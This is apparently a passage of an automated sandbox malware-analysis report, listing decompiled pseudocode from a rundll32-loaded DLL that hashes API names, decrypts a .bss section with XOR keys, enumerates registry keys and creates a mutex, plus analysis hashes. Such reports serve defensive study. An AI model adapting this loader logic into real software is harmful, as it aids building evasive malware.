                                				if (_t223 == _t319) goto 0x359e3cbb;
                                				E0000017B17B359E487A();
                                				E0000017B17B359E908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                                				if (_t223 == _t319) goto 0x359e390d;
                                				 *_t223();
                                				_t24 = _t289 + 0xa8; // 0xa8
                                				_t224 = _t24;
                                				 *_t224 = _t224;
                                				 *((long long*)(_t289 + 0xb0)) = _t224;
                                				 *(_t289 + 0x9c) = r13d;
                                				 *(_t289 + 0xa0) = r13d;
                                				 *(_t289 + 0x98) = r13d;
                                				E0000017B17B359E638C(_t224, _t230, _t292, _t230);
                                				E0000017B17B359E908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t224 == _t319) goto 0x359e395e;
                                				r9d = 0;
                                				r8d = 0;
                                				 *_t224();
                                				goto 0x359e3961;
                                				_t225 = _t319;
                                				 *((long long*)(_t289 + 0x28)) = _t225;
                                				if (_t225 != _t319) goto 0x359e398e;
                                				E0000017B17B359E908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t225 == _t319) goto 0x359e3984;
                                				 *_t225();
                                				goto 0x359e3caa;
                                				goto 0x359e3cac;
                                				r8d = 0x1102;
                                				HeapAlloc(??, ??, ??);
                                				_t320 = _t225;
                                				_t34 = _t295 + 0x7f; // 0x7f
                                				r12d = _t34;
                                				if (_t225 == _t295) goto 0x359e3a8e;
                                				 *_t225 = 0;
                                				E0000017B17B359E908C(0x3d06c463, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
                                				if (_t225 == _t295) goto 0x359e39fb;
                                				RegOpenKeyW(??, ??, ??); // executed
                                				goto 0x359e39fe;
                                				if (r12d != 0) goto 0x359e3a7e;
                                				E0000017B17B359E908C(0xdf514773, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
                                				if (_t225 == 0) goto 0x359e3a30;
                                				r9d = 0x104;
                                				RegEnumKeyW(??, ??, ??, ??); // executed
                                				goto 0x359e3a33;
                                				if (r12d != 0) goto 0x359e3a4c;
                                				_t100 = E0000017B17B359E6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                                				if (_t100 == 0) goto 0x359e3a02;
                                				if (_t100 != 0x103) goto 0x359e3a5d;
                                				 *0x359ed438 = _t320;
                                				E0000017B17B359E908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0x359ed458 + 0x20)));
                                				if (_t225 == 0) goto 0x359e3a7a;
                                				RegCloseKey(??); // executed
                                				if (0 == 0) goto 0x359e3a93;
                                				HeapFree(??, ??, ??);
                                				goto 0x359e3a93;
                                				r13d = 0;
                                				if (8 != r13d) goto 0x359e3cb1;
                                				_t296 =  *0x359ed448;
                                				_t47 = _t320 + 8; // 0x8
                                				r8d = _t47;
                                				0x359e47b0();
                                				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                                				if (E0000017B17B359EA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x17b359e0000 + _t296 + 0x11188) == r13d) goto 0x359e3b05;
                                				_t310 = 0x17b359e0000 + _t296 + 0x111e0;
                                				if (E0000017B17B359EA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0x359e3cb1;
                                				_t57 = _t289 + 8; // 0x8
                                				_t286 = _t57;
                                				if (E0000017B17B359E5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0x359e3b4b;
                                				E0000017B17B359E405C(_t230, _t289, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x30)) = _t225;
                                				if (_t225 == _t320) goto 0x359e3b4b;
                                				_t59 = _t289 + 8; // 0x8
                                				E0000017B17B359E405C(_t230, _t59, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x38)) = _t225;
                                				_t144 =  !=  ? r13d : 8;
                                				_t207 = ( !=  ? r13d : 8) - r13d;
                                				if (( !=  ? r13d : 8) != r13d) goto 0x359e3cb1;
                                				if (E0000017B17B359EA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0x359e3b6b;
                                				goto 0x359e3cb1;
                                				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                                				r9d =  *(_t301 + 0x298);
                                				_t314 = _t226 + 0x17b359ef000;
                                				r8d =  *(_t314 + 2) & 0x0000ffff;
                                				if (_t226 - _t310 + 8 <= 0) goto 0x359e3baf;
                                				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0x359e3bb2;
                                				E0000017B17B359E4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                                				goto 0x359e3bb2;
                                				_t228 = _t320;
                                				if (_t228 != _t320) goto 0x359e3bc1;
                                				goto 0x359e3cb1;
                                				r9d = r9d ^ 0xecb028fc;
                                				E0000017B17B359EA8E8(r9d, _t228, _t314, __r9);
                                				if (_t228 == _t320) goto 0x359e3bb7;
                                				 *((long long*)(_t289 + 0x40)) = _t314;
                                				 *0x359ed440 = _t289;
                                				E0000017B17B359E908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t228 == _t320) goto 0x359e3bfc;
                                				 *_t228();
                                				goto 0x359e3bff;
                                				_t229 = _t320;
                                				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0x359e3c9d;
                                				E0000017B17B359E908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x359e3c26;
                                				 *_t229();
                                				goto 0x359e3c29;
                                				E0000017B17B359E908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x359e3c4b;
                                				r8d = r13d;
                                				 *_t229();
                                				goto 0x359e3c4e;
                                				if (_t320 != _t320) goto 0x359e3c6f;
                                				E0000017B17B359E908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 != _t320) goto 0x359e397d;
                                				goto 0x359e3cac;
                                				E0000017B17B359E908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0x359e3c8f;
                                				 *_t229();
                                				goto 0x359e3c92;
                                				if (r13d != r13d) goto 0x359e3cc0;
                                				goto 0x359e3c57;
                                				asm("lock add dword [esi+0x38], 0x1");
                                				if (E0000017B17B359E9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0x359e3cc0;
                                				E0000017B17B359E6CE4(_t229, _t230, _t289, _t320, _t292);
                                				goto 0x359e3cc0;
                                				return 8;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction ID: 172c00cea179230764568db077361a788bc4c04a9c0843af2c1fd9d10c1ca429
                                • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction Fuzzy Hash: 5BD1AB3530C64096EA60AB7AE0C43EA6375FF88784F745612DE8E47792DF78E9D98300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 2b4ae433ff0857370a1cbc497c571847657174c774e06677c25a2b9a7cbc568e
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: C041C13230C78096EB608B6AE9C439966B0FBDC790F684625EE9D47B95DF38D4C5C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E0000017B17B359E4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				void* _t30;
                                				long long _t55;
                                				void* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t75;
                                				long long _t81;
                                				long long _t82;
                                				long long _t84;
                                				void* _t90;
                                				long _t92;
                                				long _t94;
                                				long _t96;
                                
                                				_t90 = __r9;
                                				_t55 = _t84;
                                				 *((long long*)(_t55 + 8)) = __rbx;
                                				 *((long long*)(_t55 + 0x10)) = _t81;
                                				 *((long long*)(_t55 + 0x18)) = __rsi;
                                				 *((long long*)(_t55 + 0x20)) = __rdi;
                                				_t82 = __rcx;
                                				r8d = 0;
                                				HeapCreate(_t96, _t94, _t92); // executed
                                				if (_t55 == 0) goto 0x359e4f03;
                                				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                                				_t74 = _t55 + _t71 + 0x68;
                                				_t22 =  *_t74;
                                				if (_t22 == 0) goto 0x359e4e94;
                                				if (_t22 == 0x7373622e) goto 0x359e4e22;
                                				_t75 = _t74 + 0x28;
                                				_t23 =  *_t75;
                                				if (_t23 != 0) goto 0x359e4e11;
                                				if (_t23 == 0) goto 0x359e4e94;
                                				r13d =  *(_t75 + 0x10);
                                				r12d =  *(_t75 + 0x14);
                                				r12d = r12d ^  *(_t71 + 8);
                                				r12d = r12d ^ r13d;
                                				HeapAlloc(??, ??, ??);
                                				if (_t55 == 0) goto 0x359e4e8d;
                                				r9d = r12d;
                                				r8d = r13d;
                                				E0000017B17B359E111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                                				r11d =  *((intOrPtr*)(_t75 + 0xc));
                                				 *0x359ed448 = _t55 - __r11 - _t82;
                                				 *0x359ed450 = E0000017B17B359E16FC(_t55, _t55 - __r11 - _t82 + 0x359f1040);
                                				goto 0x359e4e99;
                                				goto 0x359e4e99;
                                				if (2 == 0) goto 0x359e4ea8;
                                				HeapDestroy(??);
                                				goto 0x359e4f03;
                                				HeapAlloc(??, ??, ??);
                                				if (0x359f1040 != 0) goto 0x359e4ee1;
                                				HeapDestroy(??);
                                				goto 0x359e4f03;
                                				E0000017B17B359E487A();
                                				 *0x17B359F1048 = _t55;
                                				 *0x359ed458 = 0x359f1040; // executed
                                				_t30 = E0000017B17B359E37E0(0x359f1040, _t82, _t90); // executed
                                				return _t30;
                                			}

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: e9528fe483a98cddbc02fce264c898276622b6a8621f0b7805c7c0794acd3b7d
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: B8416C3570C780C6EB14CB6AA98079967B0FB89B94F248629DE4D47B94DF38E8D5C700
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E0000017B17B359EA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                                				intOrPtr _v56;
                                				void* _v64;
                                				intOrPtr _v72;
                                				long long _v88;
                                				void* __rsi;
                                				void* __rbp;
                                				long long* _t58;
                                				long long* _t59;
                                				long long _t60;
                                				long long _t75;
                                				intOrPtr* _t87;
                                
                                				_t60 = __rbx;
                                				_t58 = __rax;
                                				_a8 = __rbx;
                                				_t76 =  *0x359ed458;
                                				_t87 = __rcx;
                                				_v72 = 0x18;
                                				_v56 = 0;
                                				E0000017B17B359E908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0x359ed458 + 0x20)));
                                				if (_t58 == __rbx) goto 0x359ea804;
                                				r9d = 0; // executed
                                				 *_t58(); // executed
                                				goto 0x359ea806;
                                				if (0 == 0) goto 0x359ea8d2;
                                				r9d = 0;
                                				_a16 =  *__rcx;
                                				_t59 =  &_a24;
                                				_v88 = _t59;
                                				E0000017B17B359E1000(__edi, _t59, __rbx,  &_a16,  *0x359ed458, 0x17b359e0000,  *0x359ed448 + 0x17b359f1178);
                                				if (_t59 == _t60) goto 0x359ea8d2;
                                				E0000017B17B359E908C(0x3ff22481, _t59,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t59 == _t60) goto 0x359ea875;
                                				CreateMutexW(??, ??, ??); // executed
                                				goto 0x359ea878;
                                				_t75 = _t60;
                                				if (_t75 == _t60) goto 0x359ea8c4;
                                				E0000017B17B359E908C(0xc06f8334, _t59,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t59 == _t60) goto 0x359ea894;
                                				 *_t59();
                                				goto 0x359ea899;
                                				if (0x7f != 0xb7) goto 0x359ea8ba;
                                				E0000017B17B359E908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                                				if (_t59 == _t60) goto 0x359ea8c4;
                                				FindCloseChangeNotification(??); // executed
                                				goto 0x359ea8c4;
                                				 *((long long*)(_t87 + 0x18)) = _t75;
                                				HeapFree(??, ??, ??);
                                				return 1;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: db6a3812ee0d71742a325292374be00025361a4c6a8841b1d0df723f8dd39460
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: FD31B03260C68496EB70DF69E4843DA63B0FB88780F684621AE8E47795DF3CD5CAC750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: 1ebd3b8f3cf22dfd932cf0f2752f4740dfb835aff8eaba713b289bd1cae6e8bf
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 3A515B72608B90C6D764CB19F484B9E77B4FB84B94F219215EE8D43B94DB38D8E1DB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E0000017B17B359E5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                                				long long* _t32;
                                				long long* _t35;
                                				long long _t41;
                                				void* _t56;
                                				void* _t57;
                                
                                				_t32 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a32 = __rsi;
                                				_t48 =  *0x359ed458;
                                				E0000017B17B359E908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t32 == 0) goto 0x359e6006;
                                				LoadLibraryA(??); // executed
                                				_t35 = _t32;
                                				goto 0x359e6008;
                                				if (_t35 == 0) goto 0x359e6048;
                                				if (E0000017B17B359E40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0x359e602e;
                                				_t41 = _a24;
                                				 *_t41 = _t35;
                                				 *__rdx = _t41;
                                				goto 0x359e6066;
                                				E0000017B17B359E908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t32 == 0) goto 0x359e6066;
                                				 *_t32();
                                				goto 0x359e6066;
                                				E0000017B17B359E908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                                				if (_t32 == 0) goto 0x359e6061;
                                				 *_t32();
                                				goto 0x359e6066;
                                				return 0x7f;
                                			}









                                APIs
                                  • Part of subcall function 0000017B359E908C: SetLastError.KERNEL32 ref: 0000017B359E90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,0000017B359E8947,?,?,?,?,?,0000017B359E9D9C), ref: 0000017B359E5FFF
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction ID: 75deb83e176acdccf7a100fe03262b5a64fc68036f4809be6bebe9c32e7a7a4b
                                • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction Fuzzy Hash: 75115E3271D75086EA619B6AF5803A96270BFC8BD1F3C4531AE8E47746DF38D5C18360
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                                				void* __rbx;
                                				void* _t2;
                                				long long* _t15;
                                				long long _t16;
                                				void* _t20;
                                				long long _t21;
                                				long long _t22;
                                				void* _t24;
                                				void* _t25;
                                
                                				_t17 = __rcx;
                                				if (__edx == 0) goto 0x359e697b;
                                				if (__edx != 1) goto 0x359e6998;
                                				_t20 = __r8; // executed
                                				_t2 = E0000017B17B359E4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                                				if (_t2 == 0) goto 0x359e6998;
                                				goto 0x359e6998;
                                				E0000017B17B359E6CE4(_t15, _t16, _t17, _t20, _t22);
                                				if ( *0x359ed458 == 0) goto 0x359e6998;
                                				HeapDestroy(??); // executed
                                				return 0;
                                			}













                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: 4f65f41b0c4bdb08c19bd6f3f83a3b38ad15413d83984e0ace1e4d303491de1d
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: 92E0E57070D24041FF645A7AE5D13E90270BF95754F785A398D4E4E385DB18E8C58390
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 39%
                                			E0000017B17B359E6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t96;
                                				void* _t116;
                                				void* _t121;
                                				intOrPtr _t123;
                                				void* _t130;
                                				char _t131;
                                				void* _t156;
                                				long long* _t198;
                                				long long* _t199;
                                				long long* _t201;
                                				char* _t218;
                                				char* _t219;
                                				long _t252;
                                				intOrPtr* _t253;
                                				long _t255;
                                				void* _t260;
                                				char* _t262;
                                				long long _t263;
                                				signed long long _t269;
                                				void* _t271;
                                				void* _t272;
                                				void* _t292;
                                				void* _t293;
                                				long _t300;
                                				long _t305;
                                				void* _t307;
                                
                                				_t292 = _t271;
                                				 *((long long*)(_t292 + 8)) = __rbx;
                                				 *((long long*)(_t292 + 0x10)) = __rdx;
                                				_t272 = _t271 - 0x40;
                                				r14d =  *0x359ed450;
                                				_t253 = __rcx;
                                				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0x359ed458 + 8));
                                				if (E0000017B17B359E91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0x359ed458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0x359e7239;
                                				_t198 =  *_t253;
                                				 *((long long*)(_t272 + 0x98)) = _t198;
                                				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0x359ed458 + 8));
                                				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0x359e703b;
                                				r13d = 0xfb849f8f;
                                				E0000017B17B359E908C(r13d, _t198,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t198 == 0) goto 0x359e6e8f;
                                				 *_t198();
                                				goto 0x359e6e91;
                                				r8d = 1;
                                				HeapAlloc(_t307, _t305, _t300);
                                				 *((long long*)(_t272 + 0x28)) = _t198;
                                				if (_t198 == 0) goto 0x359e722f;
                                				0x359e47b0();
                                				_t262 = _t198;
                                				if ( *_t262 == 0x20) goto 0x359e6edc;
                                				if ( *_t262 != 9) goto 0x359e6ee1;
                                				_t263 = _t262 + 1;
                                				goto 0x359e6ed0;
                                				if ( *_t263 == 0) goto 0x359e6f74;
                                				E0000017B17B359E908C(r13d, _t198,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t198 == 0) goto 0x359e6f03;
                                				 *_t198();
                                				goto 0x359e6f05;
                                				asm("cdq");
                                				_t15 = _t198 + 1; // 0x1
                                				r8d = _t15;
                                				HeapAlloc(_t293, _t252, _t255);
                                				if (_t198 == 0) goto 0x359e6f76;
                                				_t130 =  *_t263;
                                				if (_t130 == 0) goto 0x359e6f46;
                                				if (_t130 == 0x20) goto 0x359e6f42;
                                				_t218 = _t263 + 1;
                                				_t131 =  *_t218;
                                				if (_t131 != 0) goto 0x359e6f34;
                                				if (_t131 != 0) goto 0x359e6f48;
                                				if (_t218 == 0) goto 0x359e6f62;
                                				 *_t218 = 0;
                                				_t219 = _t218 + 1;
                                				if ( *_t219 == 0x20) goto 0x359e6f5d;
                                				if ( *_t219 != 9) goto 0x359e6f62;
                                				goto 0x359e6f53;
                                				 *_t198 = _t263;
                                				_t199 = _t198 +  *((intOrPtr*)( *0x359ed458 + 8));
                                				if (_t219 + 1 != 0) goto 0x359e6f2a;
                                				goto 0x359e6f7e;
                                				if (0 == 0) goto 0x359e7021;
                                				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t199 == 0) goto 0x359e6fa8;
                                				 *_t199();
                                				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                                				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                                				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                                				if ( *((char*)(_t253 + 0x70)) == 0) goto 0x359e6fcb;
                                				 *((char*)(_t253 + 0x70)) = 0;
                                				asm("lock and dword [edi+0x2c], 0xfffffffe");
                                				E0000017B17B359E908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t199 == 0) goto 0x359e6fea;
                                				 *_t199();
                                				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0x359e7010;
                                				HeapFree(_t260, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0x359e7040;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				if (0x57 != 0) goto 0x359e723e;
                                				if (E0000017B17B359E91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e7239;
                                				_t96 = E0000017B17B359E672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                                				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                                				if (_t96 != 0) goto 0x359e70a8;
                                				if (_t123 == 0) goto 0x359e7239;
                                				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                                				if (E0000017B17B359E91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e7166;
                                				_t46 = _t199 + 0x10; // 0x10
                                				_t116 = _t46;
                                				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                                				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t199 == 0) goto 0x359e7109;
                                				 *_t199();
                                				r8d = _t156;
                                				0x359e47b0();
                                				if (_t156 - _t116 >= 0) goto 0x359e7134;
                                				r8d = _t116 - _t156;
                                				E0000017B17B359E487A();
                                				E0000017B17B359E908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t199 == 0) goto 0x359e714e;
                                				 *_t199();
                                				HeapFree(??, ??, ??);
                                				_t269 =  *((intOrPtr*)(_t272 + 0x88));
                                				r14d = r14d ^ 0x1a1a0866;
                                				if (E0000017B17B359E91C8(_t123, r14d, _t199,  *((intOrPtr*)(_t272 + 0x30)), _t269,  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0x359e723e;
                                				if (E0000017B17B359E672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98) == 0) goto 0x359e723e;
                                				if ( *((intOrPtr*)(_t272 + 0x98)) == 0) goto 0x359e723e;
                                				E0000017B17B359E908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t199 == 0) goto 0x359e71de;
                                				 *_t199();
                                				E0000017B17B359E908C(0x9c66d81c, _t199,  *((intOrPtr*)( *0x359ed458 + 0x18)));
                                				if (_t199 == 0) goto 0x359e71f8;
                                				 *_t199();
                                				_t201 =  *((intOrPtr*)(_t272 + 0x28)) + _t269 * 0x23c34600;
                                				 *((long long*)(_t272 + 0x28)) = _t201;
                                				 *((long long*)(_t253 + 0x30)) = _t201;
                                				E0000017B17B359E908C(0x8d72aad2, _t201,  *((intOrPtr*)( *0x359ed458 + 0x10)));
                                				if (_t201 == 0) goto 0x359e723e;
                                				 *_t201();
                                				goto 0x359e723e;
                                				goto 0x359e7040;
                                				return 1;
                                			}

































                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.357593711.0000017B359E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017B359E0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_17b359e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Free$Alloc$ErrorLast
                                • String ID: uJ$uJ$uJ
                                • API String ID: 1659099196-303439786
                                • Opcode ID: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction ID: 61b19465f11731e083c075869b8d134122826b945a78642a6a105bb0dd7d5bae
                                • Opcode Fuzzy Hash: 0009eb8cc0e7ac2dbfe6d5ea119122e533f5930bbc08966e566b1206be97e56d
                                • Instruction Fuzzy Hash: 89C18D3220DB8195EB65DB7AE8843DA63B0FF88B84F6846259E8D47786DF38C5C5C740
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 15%
                                			E0000017B17B359E5638(long long __rbx, long long __rcx, void* __rdx, long long __r8, void* __r11) {
                                				void* __rbp;
                                				signed long long _t89;
                                				signed long long _t109;
                                				signed long long _t122;
                                				signed long long _t131;
                                				intOrPtr _t141;
                                				void* _t167;
                                				void* _t186;
                                				long long* _t187;
                                				long long _t188;
                                				long long _t190;
                                				long long _t192;
                                				long long* _t193;
                                				long long* _t234;
                                				long _t237;
                                				long _t240;
                                				void* _t243;
                                				void* _t248;
                                				void* _t249;
                                				void* _t264;
                                				void* _t269;
                                				void* _t270;
                                				long _t273;
                                				long _t277;
                                				void* _t281;
                                
                                				_t269 = __r11;
                                				_t192 = __rbx;
